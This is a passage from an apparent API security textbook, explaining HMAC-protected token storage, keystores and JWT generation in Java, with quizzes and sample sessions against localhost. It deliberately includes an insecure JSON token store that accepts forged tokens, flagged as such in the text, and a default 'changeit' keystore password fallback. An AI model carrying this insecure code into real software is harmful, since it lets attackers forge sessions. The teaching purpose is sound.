the API, the authentication tag is first validated and then stripped from the token ID before
passing it to the database token store. If the authentication tag is invalid, then the token is
rejected before any database lookup occurs.
Pass in the real
TokenStore
implementation
and the secret key
to the constructor.
175
Hardening database token storage
@Override
public String create(Request request, Token token) {
var tokenId = delegate.create(request, token);
var tag = hmac(tokenId);
return tokenId + '.' + Base64url.encode(tag);
}
private byte[] hmac(String tokenId) {
try {
var mac = Mac.getInstance(macKey.getAlgorithm());
mac.init(macKey);
return mac.doFinal(
tokenId.getBytes(StandardCharsets.UTF_8));
} catch (GeneralSecurityException e) {
throw new RuntimeException(e);
}
}
@Override
public Optional<Token> read(Request request, String tokenId) {
return Optional.empty(); // To be written
}
}
When the client presents the token back to the API, you extract the tag from the pre-
sented token and recompute the expected tag from the secret and the rest of the
token ID. If they match then the token is authentic, and you pass it through to the
DatabaseTokenStore. If they don’t match, then the request is rejected. Listing 5.11
shows the code to validate the tag. First you need to extract the tag from the token and
decode it. You then compute the correct tag just as you did when creating a fresh
token and check the two are equal.
WARNING
As you learned in chapter 4 when validating anti-CSRF tokens, it is
important to always use a constant-time equality when comparing a secret
value (the correct authentication tag) against a user-supplied value. Timing
attacks against HMAC tag validation are a common vulnerability, so it is criti-
cal that you use MessageDigest.isEqual or an equivalent constant-time
equality function.
@Override
public Optional<Token> read(Request request, String tokenId) {
var index = tokenId.lastIndexOf('.');
if (index == -1) {
return Optional.empty();
}
var realTokenId = tokenId.substring(0, index);
Listing 5.11
Validating the HMAC tag
Call the real TokenStore to generate the
token ID, then use HMAC to calculate the tag.
Concatenate the
original token ID
with the encoded tag
as the new token ID.
Use the javax
.crypto.Mac class
to compute the
HMAC-SHA256 tag.
Extract the tag from the end
of the token ID. If not found,
then reject the request.
176
CHAPTER 5
Modern token-based authentication
var provided = Base64url.decode(tokenId.substring(index + 1));
var computed = hmac(realTokenId);
if (!MessageDigest.isEqual(provided, computed)) {
return Optional.empty();
}
return delegate.read(request, realTokenId);
}
GENERATING THE KEY
The key used for HMAC-SHA256 is just a 32-byte random value, so you could generate
one using a SecureRandom just like you currently do for database token IDs. But many
APIs will be implemented using more than one server to handle load from large num-
bers of clients, and requests from the same client may be routed to any server, so they
all need to use the same key. Otherwise, a token generated on one server will be
rejected as invalid by a different server with a different key. Even if you have only a sin-
gle server, if you ever restart it, then it will reject tokens issued before it restarted
unless the key is the same. To get around these problems, you can store the key in an
external keystore that can be loaded by each server.
DEFINITION
A keystore is an encrypted file that contains cryptographic keys
and TLS certificates used by your API. A keystore is usually protected by a
password.
Java supports loading keys from keystores using the java.security.KeyStore class,
and you can create a keystore using the keytool command shipped with the JDK. Java
provides several keystore formats, but you should use the PKCS #12 format (https://
tools.ietf.org/html/rfc7292) because that is the most secure option supported by
keytool.
Open a terminal window and navigate to the root folder of the Natter API project.
Then run the following command to generate a keystore with a 256-bit HMAC key:
keytool -genseckey -keyalg HmacSHA256 -keysize 256 \
-alias hmac-key -keystore keystore.p12 \
-storetype PKCS12 \
-storepass changeit
You can the load the keystore in your main method and then extract the key to pass to
the HmacTokenStore. Rather than hard-code the keystore password in the source
code, where it is accessible to anyone who can access the source code, you can pass it
in from a system property or environment variable. This ensures that the developers
writing the API do not know the password used for the production environment. The
Decode the tag
from the token
and compute
the correct tag.
Compare the two tags with a
constant-time equality check.
If the tag is valid, then call
the real token store with
the original token ID.
Generate a
256-bit key for
HMAC-SHA256.
Store it in a
PKCS#12
keystore.
Set a password for the keystore—
ideally better than this one!
177
Hardening database token storage
password can then be used to unlock the keystore and to access the key itself.5 After
you have loaded the key, you can then create the HmacKeyStore instance, as shown
in listing 5.12. Open Main.java in your editor and find the lines that construct the
DatabaseTokenStore and TokenController. Update them to match the listing.
var keyPassword = System.getProperty("keystore.password",
"changeit").toCharArray();
var keyStore = KeyStore.getInstance("PKCS12");
keyStore.load(new FileInputStream("keystore.p12"),
keyPassword);
var macKey = keyStore.getKey("hmac-key", keyPassword);
var databaseTokenStore = new DatabaseTokenStore(database);
var tokenStore = new HmacTokenStore(databaseTokenStore, macKey);
var tokenController = new TokenController(tokenStore);
TRYING IT OUT
Restart the API, adding -Dkeystore.password=changeit to the command line argu-
ments, and you can see the update token format when you authenticate:
$ curl -H 'Content-Type: application/json' \
-d '{"username":"test","password":"password"}' \
https://localhost:4567/users
{"username":"test"}
$ curl -H 'Content-Type: application/json' -u test:password \
-X POST https://localhost:4567/sessions
{"token":"OrosINwKcJs93WcujdzqGxK-d9s
➥ .wOaaXO4_yP4qtPmkOgphFob1HGB5X-bi0PNApBOa5nU"}
If you try and use the token without the authentication tag, then it is rejected with a
401 response. The same happens if you try to alter any part of the token ID or the tag
itself. Only the full token, with the tag, is accepted by the API.
5.3.3
Protecting sensitive attributes
Suppose that your tokens include sensitive information about users in token attri-
butes, such as their location when they logged in. You might want to use these attri-
butes to make access control decisions, such as disallowing access to confidential
documents if the token is suddenly used from a very different location. If an attacker
5 Some keystore formats support setting different passwords for each key, but PKCS #12 uses a single password
for the keystore and every key.
Listing 5.12
Loading the HMAC key
Load the keystore password
from a system property.
Load the keystore, unlocking
it with the password.
Get the HMAC key from the keystore,
using the password again.
Create the HmacTokenStore, passing in the
DatabaseTokenStore and the HMAC key.
Create a
test user.
Log in to get a
token with the
HMAC tag.
178
CHAPTER 5
Modern token-based authentication
gains read access to the database, they would learn the location of every user currently
using the system, which would violate their expectation of privacy.
The main threat to your token database is through injection attacks or logic errors in
the API itself that allow a user to perform actions against the database that they should
not be allowed to perform. This might be reading other users’ tokens or altering or
deleting them. As discussed in chapter 2, use of prepared statements makes injection
attacks much less likely. You reduced the risk even further in that chapter by using a
database account with fewer permissions rather than the default administrator account.
You can take this approach further to reduce the ability of attackers to exploit weak-
nesses in your database storage, with two additional refinements:
You can create separate database accounts to perform destructive operations
such as bulk deletion of expired tokens and deny those privileges to the database
user used for running queries in response to API requests. An attacker that
exploits an injection attack against the API is then much more limited in the
damage they can perform. This split of database privileges into separate accounts
can work well with the Command-Query Responsibility Segregation (CQRS; see https://
martinfowler.com/bliki/CQRS.html) API design pattern, in which a completely
separate API is used for query operations compared to update operations.
Encrypting database attributes
One way to protect sensitive attributes in the database is by encrypting them. While
many databases come with built-in support for encryption, and some commercial
products can add this, these solutions typically only protect against attackers that
gain access to the raw database file storage. Data returned from queries is transpar-
ently decrypted by the database server, so this type of encryption does not protect
against SQL injection or other attacks that target the database API. You can solve
this by encrypting database records in your API before sending data to the database,
and then decrypting the responses read from the database. Database encryption is
a complex topic, especially if encrypted attributes need to be searchable, and could
fill a book by itself. The open source CipherSweet library (https://ciphersweet.parag-
onie.com) provides the nearest thing to a complete solution that I am aware of, but
it lacks a Java version at present.
All searchable database encryption leaks some information about the encrypted val-
ues, and a patient attacker may eventually be able to defeat any such scheme. For
this reason, and the complexity, I recommend that developers concentrate on basic
database access controls before investigating more complex solutions. You should
still enable built-in database encryption if your database storage is hosted by a cloud
provider or other third party, and you should always encrypt all database backups—
many backup tools can do this for you.
For readers that want to learn more, I’ve provided a heavily-commented version of the
DatabaseTokenStore providing encryption and authentication of all token attributes,
as well as blind indexing of usernames in a branch of the GitHub repository that accom-
panies this book at http://mng.bz/4B75.
179
Hardening database token storage
Many databases support row-level security policies that allow queries and updates
to see a filtered view of database tables based on contextual information sup-
plied by the application. For example, you could configure a policy that
restricts the tokens that can be viewed or updated to only those with a username
attribute matching the current API user. This would prevent an attacker from
exploiting an SQL vulnerability to view or modify any other user’s tokens. The
H2 database used in this book does not support row-level security policies. See
https://www.postgresql.org/docs/current/ddl-rowsecurity.html for how to con-
figure row-level security policies for PostgreSQL as an example.
Pop quiz
4
Where should you store the secret key used for protecting database tokens with
HMAC?
a
In the database alongside the tokens.
b
In a keystore accessible only to your API servers.
c
Printed out in a physical safe in your boss’s office.
d
Hard-coded into your API’s source code on GitHub.
e
It should be a memorable password that you type into each server.
5
Given the following code for computing a HMAC authentication tag:
byte[] provided = Base64url.decode(authTag);
byte[] computed = hmac(tokenId);
which one of the following lines of code should be used to compare the two values?
a
computed.equals(provided)
b
provided.equals(computed)
c
Arrays.equals(provided, computed)
d
Objects.equals(provided, computed)
e
MessageDigest.isEqual(provided, computed)
6
Which API design pattern can be useful to reduce the impact of SQL injection
attacks?
a
Microservices
b
Model View Controller (MVC)
c
Uniform Resource Identifiers (URIs)
d
Command Query Responsibility Segregation (CQRS)
e
Hypertext as the Engine of Application State (HATEOAS)
The answers are at the end of the chapter.
180
CHAPTER 5
Modern token-based authentication
Answers to pop quiz questions
1
e. The Access-Control-Allow-Credentials header is required on both the
preflight response and on the actual response; otherwise, the browser will reject
the cookie or strip it from subsequent requests.
2
c. Use a SecureRandom or other cryptographically-secure random number gen-
erator. Remember that while the output of a hash function may look random,
it’s only as unpredictable as the input that is fed into it.
3
d. The Bearer auth scheme is used for tokens.
4
b. Store keys in a keystore or other secure storage (see part 4 of this book for
other options). Keys should not be stored in the same database as the data they
are protecting and should never be hard-coded. A password is not a suitable key
for HMAC.
5
e. Always use MessageDigest.equals or another constant-time equality test to
compare HMAC tags.
6
d. CQRS allows you to use different database users for queries versus database
updates with only the minimum privileges needed for each task. As described in
section 5.3.2, this can reduce the damage that an SQL injection attack can cause.
Summary
Cross-origin API calls can be enabled for web clients using CORS. Enabling
cookies on cross-origin calls is error-prone and becoming more difficult over
time. HTML 5 Web Storage provides an alternative to cookies for storing
cookies directly.
Web Storage prevents CSRF attacks but can be more vulnerable to token exfil-
tration via XSS. You should ensure that you prevent XSS attacks before moving
to this token storage model.
The standard Bearer authentication scheme for HTTP can be used to transmit
a token to an API, and to prompt for one if not supplied. While originally
designed for OAuth2, the scheme is now widely used for other forms of tokens.
Authentication tokens should be hashed when stored in a database to prevent
them being used if the database is compromised. Message authentication codes
(MACs) can be used to protect tokens against tampering and forgery. Hash-
based MAC (HMAC) is a standard secure algorithm for constructing a MAC
from a secure hash algorithm such as SHA-256.
Database access controls and row-level security policies can be used to further
harden a database against attacks, limiting the damage that can be done. Data-
base encryption can be used to protect sensitive attributes but is a complex
topic with many failure cases.
181
Self-contained
tokens and JWTs
You’ve shifted the Natter API over to using the database token store with tokens
stored in Web Storage. The good news is that Natter is really taking off. Your user
base has grown to millions of regular users. The bad news is that the token database
is struggling to cope with this level of traffic. You’ve evaluated different database
backends, but you’ve heard about stateless tokens that would allow you to get rid of
the database entirely. Without a database slowing you down, Natter will be able to
scale up as the user base continues to grow. In this chapter, you’ll implement self-
contained tokens securely, and examine some of the security trade-offs compared
to database-backed tokens. You’ll also learn about the JSON Web Token (JWT) stan-
dard that is the most widely used token format today.
This chapter covers
Scaling token-based authentication with
encrypted client-side storage
Protecting tokens with MACs and authenticated
encryption
Generating standard JSON Web Tokens
Handling token revocation when all the state is
on the client
182
CHAPTER 6
Self-contained tokens and JWTs
DEFINITION
JSON Web Tokens (JWTs, pronounced “jots”) are a standard for-
mat for self-contained security tokens. A JWT consists of a set of claims about
a user represented as a JSON object, together with a header describing the
format of the token. JWTs are cryptographically protected against tampering
and can also be encrypted.
6.1
Storing token state on the client
The idea behind stateless tokens is simple. Rather than store the token state in the
database, you can instead encode that state directly into the token ID and send it to
the client. For example, you could serialize the token fields into a JSON object, which
you then Base64url-encode to create a string that you can use as the token ID. When
the token is presented back to the API, you then simply decode the token and parse
the JSON to recover the attributes of the session.
Listing 6.1 shows a JSON token store that does exactly that. It uses short keys for
attributes, such as sub for the subject (username), and exp for the expiry time, to save
space. These are standard JWT attributes, as you’ll learn in section 6.2.1. Leave the
revoke method blank for now, you will come back to that shortly in section 6.5. Navi-
gate to the src/main/java/com/manning/apisecurityinaction/token folder and cre-
ate a new file JsonTokenStore.java in your editor. Type in the contents of listing 6.1
and save the new file.
WARNING
This code is not secure on its own because pure JSON tokens can
be altered and forged. You’ll add support for token authentication in sec-
tion 6.1.1.
package com.manning.apisecurityinaction.token;
import org.json.*;
import spark.Request;
import java.time.Instant;
import java.util.*;
import static java.nio.charset.StandardCharsets.UTF_8;
public class JsonTokenStore implements TokenStore {
@Override
public String create(Request request, Token token) {
var json = new JSONObject();
json.put("sub", token.username);
json.put("exp", token.expiry.getEpochSecond());
json.put("attrs", token.attributes);
var jsonBytes = json.toString().getBytes(UTF_8);
return Base64url.encode(jsonBytes);
}
@Override
public Optional<Token> read(Request request, String tokenId) {
Listing 6.1
The JSON token store
Convert the token
attributes into a
JSON object.
Encode the JSON
object with URL-safe
Base64-encoding.
183
Storing token state on the client
try {
var decoded = Base64url.decode(tokenId);
var json = new JSONObject(new String(decoded, UTF_8));
var expiry = Instant.ofEpochSecond(json.getInt("exp"));
var username = json.getString("sub");
var attrs = json.getJSONObject("attrs");
var token = new Token(expiry, username);
for (var key : attrs.keySet()) {
token.attributes.put(key, attrs.getString(key));
}
return Optional.of(token);
} catch (JSONException e) {
return Optional.empty();
}
}
@Override
public void revoke(Request request, String tokenId) {
// TODO
}
}
6.1.1
Protecting JSON tokens with HMAC
Of course, as it stands, this code is completely insecure. Anybody can log in to the API
and then edit the encoded token in their browser to change their username or other
security attributes! In fact, they can just create a brand-new token themselves without
ever logging in. You can fix that by reusing the HmacTokenStore that you created in
chapter 5, as shown in figure 6.1. By appending an authentication tag computed with
a secret key known only to the API server, an attacker is prevented from either creat-
ing a fake token or altering an existing one.
To enable HMAC-protected tokens, open Main.java in your editor and change the
code that constructs the DatabaseTokenStore to instead create a JsonTokenStore:
TokenStore tokenStore = new JsonTokenStore();
tokenStore = new HmacTokenStore(tokenStore, macKey);
var tokenController = new TokenController(tokenStore);
You can try it out to see your first stateless token in action:
$ curl -H 'Content-Type: application/json' -u test:password \
-X POST https://localhost:4567/sessions
{"token":"eyJzdWIiOiJ0ZXN0IiwiZXhwIjoxNTU5NTgyMTI5LCJhdHRycyI6e319.
➥ INFgLC3cAhJ8DjzPgQfHBHvU_uItnFjt568mQ43V7YI"}
To read the token,
decode it and
parse the JSON
to recover the
attributes.
Leave the revoke
method blank for now.
Construct the JsonTokenStore.
Wrap it in a
HmacTokenStore to
ensure authenticity.
184
CHAPTER 6
Self-contained tokens and JWTs
Pop quiz
1
Which of the STRIDE threats does the HmacTokenStore protect against? (There
may be more than one correct answer.)
a
Spoofing
b
Tampering
c
Repudiation
d
Information disclosure
e
Denial of service
f
Elevation of privilege
The answer is at the end of the chapter.
{"sub":"test","exp":12345,...}
URL-safe Base64
eyJzdWIiOiJ0ZXN0IiwiZXhwIjoxMjM0NSwuLi59
HMAC-SHA256
URL-safe Base64
eyJzdWIiOiJ0ZXN0IiwiZXhwIjoxMjM0NSwuLi59.dnYUdylHgTGpNcv39ol...
f9d9d851dca5...
JSON claims are encoded into
URL-safe Base64 encoding.
The encoded token is
authenticated with HMAC.
The HMAC tag is
encoded and appended
to the token.
Key
Figure 6.1
An HMAC tag is computed over the encoded JSON claims using a secret key.
The HMAC tag is then itself encoded into URL-safe Base64 format and appended to the
token, using a period as a separator. As a period is not a valid character in Base64
encoding, you can use this to find the tag later.
185
JSON Web Tokens
6.2
JSON Web Tokens
Authenticated client-side tokens have become very popular in recent years, thanks in
part to the standardization of JSON Web Tokens in 2015. JWTs are very similar to the
JSON tokens you have just produced, but have many more features:
A standard header format that contains metadata about the JWT, such as which
MAC or encryption algorithm was used.
A set of standard claims that can be used in the JSON content of the JWT, with
defined meanings, such as exp to indicate the expiry time and sub for the sub-
ject, just as you have been using.
A wide range of algorithms for authentication and encryption, as well as digital
signatures and public key encryption that are covered later in this book.
Because JWTs are standardized, they can be used with lots of existing tools, libraries,
and services. JWT libraries exist for most programming languages now, and many
API frameworks include built-in support for JWTs, making them an attractive format
to use. The OpenID Connect (OIDC) authentication protocol that’s discussed in
chapter 7 uses JWTs as a standard format to convey identity claims about users
between systems.
A basic authenticated JWT is almost exactly like the HMAC-authenticated JSON
tokens that you produced in section 6.1.1, but with an additional JSON header that
indicates the algorithm and other details of how the JWT was produced, as shown in
figure 6.2. The Base64url-encoded format used for JWTs is known as the JWS Compact
Serialization. JWS also defines another format, but the compact serialization is the most
widely used for API tokens.
The JWT standards zoo
While JWT itself is just one specification (https://tools.ietf.org/html/rfc7519), it
builds on a collection of standards collectively known as JSON Object Signing and
Encryption (JOSE). JOSE itself consists of several related standards:
JSON Web Signing (JWS, https://tools.ietf.org/html/rfc7515) defines how
JSON objects can be authenticated with HMAC and digital signatures.
JSON Web Encryption (JWE, https://tools.ietf.org/html/rfc7516) defines how
to encrypt JSON objects.
JSON Web Key (JWK, https://tools.ietf.org/html/rfc7517) describes a stan-
dard format for cryptographic keys and related metadata in JSON.
JSON Web Algorithms (JWA, https://tools.ietf.org/html/rfc7518) then speci-
fies signing and encryption algorithms to be used.
JOSE has been extended over the years by new specifications to add new algorithms
and options. It is common to use JWT to refer to the whole collection of specifica-
tions, although there are uses of JOSE beyond JWTs.
186
CHAPTER 6
Self-contained tokens and JWTs
The flexibility of JWT is also its biggest weakness, as several attacks have been found
in the past that exploit this flexibility. JOSE is a kit-of-parts design, allowing develop-
ers to pick and choose from a wide variety of algorithms, and not all combinations
of features are secure. For example, in 2015 the security researcher Tim McClean
discovered vulnerabilities in many JWT libraries (http://mng.bz/awKz) in which an
attacker could change the algorithm header in a JWT to influence how the recipient
validated the token. It was even possible to change it to the value none, which
instructed the JWT library to not validate the signature at all! These kinds of security
flaws have led some people to argue that JWTs are inherently insecure due to the
ease with which they can be misused, and the poor security of some of the standard
algorithms.
I’ll let you come to your own conclusions about whether to use JWTs. In this chapter
you’ll see how to implement some of the features of JWTs from scratch, so you can
decide if the extra complexity is worth it. There are many cases in which JWTs cannot
be avoided, so I’ll point out security best practices and gotchas so that you can use
them safely.
PASETO: An alternative to JOSE
The error-prone nature of the standards has led to the development of alternative for-
mats intended to be used for many of the same purposes as JOSE but with fewer
tricky implementation details and opportunities for misuse. One example is PASETO
(https://paseto.io), which provides either symmetric authenticated encryption or pub-
lic key signed JSON objects, covering many of the same use-cases as the JOSE and
JWT standards. The main difference from JOSE is that PASETO only allows a devel-
oper to specify a format version. Each version uses a fixed set of cryptographic algo-
rithms rather than allowing a wide choice of algorithms: version 1 requires widely
implemented algorithms such as AES and RSA, while version 2 requires more modern
but less widely implemented algorithms such as Ed25519. This gives an attacker
much less scope to confuse the implementation and the chosen algorithms have few
known weaknesses.
eyJ0eXAiOiJKV1Qi.eyJzdWIiOiJ0.QlZiSNH2tt5sFTmfn
Header
Claims
HMAC tag
Figure 6.2
The JWS Compact Serialization
consists of three URL-safe Base64-encoded
parts, separated by periods. First comes
the header, then the payload or claims, and
finally the authentication tag or signature.
The values in this diagram have been
shortened for display purposes.
187
JSON Web Tokens
6.2.1
The standard JWT claims
One of the most useful parts of the JWT specification is the standard set of JSON
object properties defined to hold claims about a subject, known as a claims set. You’ve
already seen two standard JWT claims, because you used them in the implementation
of the JsonTokenStore:
The exp claim indicates the expiry time of a JWT in UNIX time, which is the
number of seconds since midnight on January 1, 1970 in UTC.
The sub claim identifies the subject of the token: the user. Other claims in the
token are generally making claims about this subject.
JWT defines a handful of other claims too, which are listed in table 6.1. To save space,
each claim is represented with a three-letter JSON object property.
Of these claims, only the issuer, issued-at, and subject claims express a positive state-
ment. The remaining fields all describe constraints on how the token can be used
rather than making a claim. These constraints are intended to prevent certain kinds
of attacks against security tokens, such as replay attacks in which a token sent by a genu-
ine party to a service to gain access is captured by an attacker and later replayed so
that the attacker can gain access. Setting a short expiry time can reduce the window of
opportunity for such attacks, but not eliminate them. The JWT ID can be used to add
a unique value to a JWT, which the recipient can then remember until the token
expires to prevent the same token being replayed. Replay attacks are largely pre-
vented by the use of TLS but can be important if you have to send a token over an
insecure channel or as part of an authentication protocol.
Table 6.1
Standard JWT claims
Claim
Name
Purpose
iss
Issuer
Indicates who created the JWT. This is a single string and often the URI of the
authentication service.
aud
Audience
Indicates who the JWT is for. An array of strings identifying the intended recip-
ients of the JWT. If there is only a single value, then it can be a simple string
value rather than an array. The recipient of a JWT must check that its identi-
fier appears in the audience; otherwise, it should reject the JWT. Typically, this
is a set of URIs for APIs where the token can be used.
iat
Issued-At
The UNIX time at which the JWT was created.
nbf
Not-Before
The JWT should be rejected if used before this time.
exp
Expiry
The UNIX time at which the JWT expires and should be rejected by recipients.
sub
Subject
The identity of the subject of the JWT. A string. Usually a username or other
unique identifier.
jti
JWT ID
A unique ID for the JWT, which can be used to detect replay.
188
CHAPTER 6
Self-contained tokens and JWTs
DEFINITION
A replay attack occurs when an attacker captures a token sent by a
legitimate party and later replays it on their own request.
The issuer and audience claims can be used to prevent a different form of replay
attack, in which the captured token is replayed against a different API than the origi-
nally intended recipient. If the attacker replays the token back to the original issuer,
this is known as a reflection attack, and can be used to defeat some kinds of authentica-
tion protocols if the recipient can be tricked into accepting their own authentication
messages. By verifying that your API server is in the audience list, and that the token
was issued by a trusted party, these attacks can be defeated.
6.2.2
The JOSE header
Most of the flexibility of the JOSE and JWT standards is concentrated in the header,
which is an additional JSON object that is included in the authentication tag and con-
tains metadata about the JWT. For example, the following header indicates that the
token is signed with HMAC-SHA-256 using a key with the given key ID:
{
"alg": "HS256",
"kid": "hmac-key-1"
}
Although seemingly innocuous, the JOSE header is one of the more error-prone
aspects of the specifications, which is why the code you have written so far does not
generate a header, and I often recommend that they are stripped when possible to
create (nonstandard) headless JWTs. This can be done by removing the header section
produced by a standard JWT library before sending it and then recreating it again
before validating a received JWT. Many of the standard headers defined by JOSE can
open your API to attacks if you are not careful, as described in this section.
DEFINITION
A headless JWT is a JWT with the header removed. The recipient
recreates the header from expected values. For simple use cases where you
control the sender and recipient this can reduce the size and attack surface of
using JWTs but the resulting JWTs are nonstandard. Where headless JWTs
can’t be used, you should strictly validate all header values.
The tokens you produced in section 6.1.1 are effectively headless JWTs and adding a
JOSE header to them (and including it in the HMAC calculation) would make them
standards-compliant. From now on you’ll use a real JWT library, though, rather than
writing your own.
THE ALGORITHM HEADER
The alg header identifies the JWS or JWE cryptographic algorithm that was used to
authenticate or encrypt the contents. This is also the only mandatory header value.
The purpose of this header is to enable cryptographic agility, allowing an API to change
the algorithm that it uses while still processing tokens issued using the old algorithm.
The algorithm
The key identifier
189
JSON Web Tokens
DEFINITION
Cryptographic agility is the ability to change the algorithm used for
securing messages or tokens in case weaknesses are discovered in one algo-
rithm or a more performant alternative is required.
Although this is a good idea, the design in JOSE is less than ideal because the recipi-
ent must rely on the sender to tell them which algorithm to use to authenticate the
message. This violates the principle that you should never trust a claim that you have
not authenticated, and yet you cannot authenticate the JWT until you have processed
this claim! This weakness was what allowed Tim McClean to confuse JWT libraries by
changing the alg header.
A better solution is to store the algorithm as metadata associated with a key on the
server. You can then change the algorithm when you change the key, a methodology I
refer to as key-driven cryptographic agility. This is much safer than recording the algo-
rithm in the message, because an attacker has no ability to change the keys stored on
your server. The JSON Web Key (JWK) specification allows an algorithm to be associ-
ated with a key, as shown in listing 6.2, using the alg attribute. JOSE defines standard
names for many authentication and encryption algorithms and the standard name for
HMAC-SHA256 that you’ll use in this example is HS256. A secret key used for HMAC
or AES is known as an octet key in JWK, as the key is just a sequence of random bytes
and octet is an alternative word for byte. The key type is indicated by the kty attribute
in a JWK, with the value oct used for octet keys.
DEFINITION
In key-driven cryptographic agility, the algorithm used to authenti-
cate a token is stored as metadata with the key on the server rather than as a
header on the token. To change the algorithm, you install a new key. This
prevents an attacker from tricking the server into using an incompatible
algorithm.
{
"kty": "oct",
"alg": "HS256",
"k": "9ITYj4mt-TLYT2b_vnAyCVurks1r2uzCLw7sOxg-75g"
}
The JWE specification also includes an enc header that specifies the cipher used to
encrypt the JSON body. This header is less error-prone than the alg header, but you
should still validate that it contains a sensible value. Encrypted JWTs are discussed in
section 6.3.3.
SPECIFYING THE KEY IN THE HEADER
To allow implementations to periodically change the key that they use to authenticate
JWTs, in a process known as key rotation, the JOSE specifications include several ways to
indicate which key was used. This allows the recipient to quickly find the right key to
verify the token, without having to try each key in turn. The JOSE specs include one
Listing 6.2
A JWK with algorithm claim
The algorithm the key
is to be used for
The Base64-encoded
bytes of the key itself
190
CHAPTER 6
Self-contained tokens and JWTs
safe way to do this (the kid header) and two potentially dangerous alternatives listed
in table 6.2.
DEFINITION
Key rotation is the process of periodically changing the keys used
to protect messages and tokens. Changing the key regularly ensures that the
usage limits for a key are never reached and if any one key is compromised
then it is soon replaced, limiting the time in which damage can be done.
DEFINITION
A server-side request forgery (SSRF) attack occurs when an attacker
can cause a server to make outgoing network requests under the attacker’s
control. Because the server is on a trusted network behind a firewall, this
allows the attacker to probe and potentially attack machines on the internal
network that they could not otherwise access. You’ll learn more about SSRF
attacks and how to prevent them in chapter 10.
There are also headers for specifying the key as an X.509 certificate (used in TLS). Pars-
ing and validating X.509 certificates is very complex so you should avoid these headers.
6.2.3
Generating standard JWTs
Now that you’ve seen the basic idea of how a JWT is constructed, you’ll switch to using
a real JWT library for generating JWTs for the rest of the chapter. It’s always better to
use a well-tested library for security when one is available. There are many JWT and
JOSE libraries for most programming languages, and the https://jwt.io website main-
tains a list. You should check that the library is actively maintained and that the devel-
opers are aware of historical JWT vulnerabilities such as the ones mentioned in this
chapter. For this chapter, you can use Nimbus JOSE + JWT from https://connect2id
.com/products/nimbus-jose-jwt, which is a well-maintained open source (Apache 2.0
licensed) Java JOSE library. Open the pom.xml file in the Natter project root folder and
add the following dependency to the dependencies section to load the Nimbus library:
<dependency>
<groupId>com.nimbusds</groupId>
<artifactId>nimbus-jose-jwt</artifactId>
Table 6.2
Indicating the key in a JOSE header
Header
Contents
Safe?
Comments
kid
A key ID
Yes
As the key ID is just a string identifier, it can be safely looked up in a
server-side set of keys.
jwk
The full key
No
Trusting the sender to give you the key to verify a message loses all
security properties.
jku
An URL to
retrieve the
full key
No
The intention of this header is that the recipient can retrieve the key
from a HTTPS endpoint, rather than including it directly in the mes-
sage, to save space. Unfortunately, this has all the issues of the
jwk header, but additionally opens the recipient up to SSRF attacks.
191
JSON Web Tokens
<version>8.19</version>
</dependency>
Listing 6.3 shows how to use the library to generate a signed JWT. The code is generic
and can be used with any JWS algorithm, but for now you’ll use the HS256 algorithm,
which uses HMAC-SHA-256, just like the existing HmacTokenStore. The Nimbus
library requires a JWSSigner object for generating signatures, and a JWSVerifier for
verifying them. These objects can often be used with several algorithms, so you should
also pass in the specific algorithm to use as a separate JWSAlgorithm object. Finally,
you should also pass in a value to use as the audience for the generated JWTs. This
should usually be the base URI of the API server, such as https:/ /localhost:4567. By
setting and verifying the audience claim, you ensure that a JWT can’t be used to access
a different API, even if they happen to use the same cryptographic key. To produce
the JWT you first build the claims set, set the sub claim to the username, the exp claim
to the token expiry time, and the aud claim to the audience value you got from the
constructor. You can then set any other attributes of the token as a custom claim,
which will become a nested JSON object in the claims set. To sign the JWT you then
set the correct algorithm in the header and use the JWSSigner object to calculate the
signature. The serialize() method will then produce the JWS Compact Serialization
of the JWT to return as the token identifier. Create a new file named SignedJwtToken-
Store.java under src/main/resources/com/manning/apisecurityinaction/token and
copy the contents of the listing.
package com.manning.apisecurityinaction.token;
import javax.crypto.SecretKey;
import java.text.ParseException;
import java.util.*;
import com.nimbusds.jose.*;
import com.nimbusds.jwt.*;
import spark.Request;
public class SignedJwtTokenStore implements TokenStore {
private final JWSSigner signer;
private final JWSVerifier verifier;
private final JWSAlgorithm algorithm;
private final String audience;
public SignedJwtTokenStore(JWSSigner signer,
JWSVerifier verifier, JWSAlgorithm algorithm,
String audience) {
this.signer = signer;
this.verifier = verifier;
this.algorithm = algorithm;
this.audience = audience;
}
Listing 6.3
Generating a signed JWT
Pass in the
algorithm,
audience, and
signer and
verifier objects.
192
CHAPTER 6
Self-contained tokens and JWTs
@Override
public String create(Request request, Token token) {
var claimsSet = new JWTClaimsSet.Builder()
.subject(token.username)
.audience(audience)
.expirationTime(Date.from(token.expiry))
.claim("attrs", token.attributes)
.build();
var header = new JWSHeader(JWSAlgorithm.HS256);
var jwt = new SignedJWT(header, claimsSet);
try {
jwt.sign(signer);
return jwt.serialize();
} catch (JOSEException e) {
throw new RuntimeException(e);
}
}
@Override
public Optional<Token> read(Request request, String tokenId) {
// TODO
return Optional.empty();
}
@Override
public void revoke(Request request, String tokenId) {
// TODO
}
}
To use the new token store, open the Main.java file in your editor and change the
code that constructs the JsonTokenStore and HmacTokenStore to instead construct a
SignedJwtTokenStore. You can reuse the same macKey that you loaded for the Hmac-
TokenStore, as you’re using the same algorithm for signing the JWTs. The code
should look like the following, using the MACSigner and MACVerifier classes for sign-
ing and verification using HMAC:
var algorithm = JWSAlgorithm.HS256;
var signer = new MACSigner((SecretKey) macKey);
var verifier = new MACVerifier((SecretKey) macKey);
TokenStore tokenStore = new SignedJwtTokenStore(
signer, verifier, algorithm, "https://localhost:4567");
var tokenController = new TokenController(tokenStore);
You can now restart the API server, create a test user, and log in to see the created JWT:
$ curl -H 'Content-Type: application/json' \
-d '{"username":"test","password":"password"}' \
https://localhost:4567/users
{"username":"test"}
Create the JWT
claims set with
details about
the token.
Specify the algorithm
in the header and
build the JWT.
Sign the JWT
using the
JWSSigner
object.
Convert the signed
JWT into the JWS
compact serialization.
Construct the MACSigner
and MACVerifier objects
with the macKey.
Pass the signer, verifier, algorithm, and
audience to the SignedJwtTokenStore.
193
JSON Web Tokens
$ curl -H 'Content-Type: application/json' -u test:password \
-d '' https://localhost:4567/sessions
{"token":"eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJ0ZXN0IiwiYXVkIjoiaHR0cH
➥ M6XC9cL2xvY2FsaG9zdDo0NTY3IiwiZXhwIjoxNTc3MDA3ODcyLCJhdHRycyI
➥ 6e319.nMxLeSG6pmrPOhRSNKF4v31eQZ3uxaPVyj-Ztf-vZQw"}
You can take this JWT and paste it into the debugger at https://jwt.io to validate it and
see the contents of the header and claims, as shown in figure 6.3.
WARNING
